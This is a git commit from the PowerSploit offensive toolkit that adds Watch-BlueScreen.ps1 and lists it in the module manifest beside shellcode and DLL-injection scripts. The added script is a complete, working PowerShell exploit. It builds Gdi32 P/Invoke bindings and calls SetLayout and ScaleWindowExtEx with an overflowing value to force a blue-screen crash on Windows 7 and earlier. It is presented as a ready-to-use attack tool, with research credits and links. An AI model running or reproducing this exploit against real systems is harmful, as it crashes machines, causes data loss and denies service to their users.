diff options
| author | Matt Graeber <mattgraeber@gmail.com> | 2013-05-13 20:01:59 -0400 |
|---|---|---|
| committer | Matt Graeber <mattgraeber@gmail.com> | 2013-05-13 20:01:59 -0400 |
| commit | 2a17b8fb56db07519e8e6b7d6819749ce743c882 (patch) | |
| tree | 7315164342e510e3ab7b7feccdaab24204a53f3b /CodeExecution | |
| parent | f32a572fb971f288d2950af9a6c6d2031a52df2b (diff) | |
| download | PowerSploit-2a17b8fb56db07519e8e6b7d6819749ce743c882.tar.gz PowerSploit-2a17b8fb56db07519e8e6b7d6819749ce743c882.zip | |
Added Watch-BlueScreen
Causes a blue-screen (bugcheck) to occur.
Diffstat (limited to 'CodeExecution')
| -rw-r--r-- | CodeExecution/CodeExecution.psd1 | 2 | ||||
| -rw-r--r-- | CodeExecution/Watch-BlueScreen.ps1 | 74 |
2 files changed, 75 insertions, 1 deletions
diff --git a/CodeExecution/CodeExecution.psd1 b/CodeExecution/CodeExecution.psd1 index 180c25e..c6c87f7 100644 --- a/CodeExecution/CodeExecution.psd1 +++ b/CodeExecution/CodeExecution.psd1 @@ -74,7 +74,7 @@ ModuleList = @(@{ModuleName = 'CodeExecution'; ModuleVersion = '1.0.0.0'; GUID = # List of all files packaged with this module FileList = 'CodeExecution.psm1', 'CodeExecution.psd1', 'Invoke-Shellcode.ps1', 'Invoke-DllInjection.ps1', - 'Invoke-ShellcodeMSIL.ps1', 'Invoke-ReflectiveDllInjection.ps1', 'Usage.md' + 'Invoke-ShellcodeMSIL.ps1', 'Invoke-ReflectiveDllInjection.ps1', 'Watch-BlueScreen.ps1', 'Usage.md' # Private data to pass to the module specified in RootModule/ModuleToProcess # PrivateData = '' diff --git a/CodeExecution/Watch-BlueScreen.ps1 b/CodeExecution/Watch-BlueScreen.ps1 new file mode 100644 index 0000000..8523bf2 --- /dev/null +++ b/CodeExecution/Watch-BlueScreen.ps1 @@ -0,0 +1,74 @@ +function Watch-BlueScreen +{ +<# +.SYNOPSIS + + Cause a blue screen to occur (Windows 7 and below). + + PowerSploit Function: Watch-BlueScreen + Author: Matthew Graeber (@mattifestation) + Original Research: Tavis Ormandy and Nikita Tarakanov + License: BSD 3-Clause + Required Dependencies: None + Optional Dependencies: None + +.NOTES + + Tavis Ormandy documented this technique on 2/3/2013 and Nikita Tarakanov + tweeted this technique on 5/13/2013. + +.LINK + + https://gist.github.com/taviso/4658638 + http://blog.cmpxchg8b.com/2013/02/the-other-integer-overflow.html + https://twitter.com/NTarakanov/status/334031968465453057 +#> + + try { $Gdi32 = [Gdi32] } catch [Management.Automation.RuntimeException] + { + $DynAssembly = New-Object System.Reflection.AssemblyName('BSOD') + $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, 'Run') + $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('BSOD', $False) + $TypeBuilder = $ModuleBuilder.DefineType('Gdi32', 'Public, Class') + + $DllImportConstructor = [Runtime.InteropServices.DllImportAttribute].GetConstructor(@([String])) + $SetLastError = [Runtime.InteropServices.DllImportAttribute].GetField('SetLastError') + $SetLastErrorCustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder( $DllImportConstructor, @('ntdll.dll'), + [Reflection.FieldInfo[]]@($SetLastError), @($true)) + + $TypeBuilder.DefinePInvokeMethod( 'CreateCompatibleDC', + 'Gdi32.dll', + 'Public, Static', + 'Standard', + [IntPtr], + @([IntPtr]), + 'Winapi', + 'Auto' ).SetCustomAttribute($SetLastErrorCustomAttribute) + + $TypeBuilder.DefinePInvokeMethod( 'SetLayout', + 'Gdi32.dll', + 'Public, Static', + 'Standard', + [UInt32], + @([IntPtr], [UInt32]), + 'Winapi', + 'Auto' ) | Out-Null + + $TypeBuilder.DefinePInvokeMethod( 'ScaleWindowExtEx', + 'Gdi32.dll', + 'Public, Static', + 'Standard', + [Bool], + @([IntPtr], [Int32], [Int32], [Int32], [Int32], [IntPtr]), + 'Winapi', + 'Auto' ) | Out-Null + + $Gdi32 = $TypeBuilder.CreateType() + } + + $LAYOUT_RTL = 1 + + $DC = $Gdi32::CreateCompatibleDC([IntPtr]::Zero) + $Gdi32::SetLayout($DC, $LAYOUT_RTL) | Out-Null + $Gdi32::ScaleWindowExtEx($DC, [Int32]::MinValue, -1, 1, 1, [IntPtr]::Zero) | Out-Null +}
\ No newline at end of file |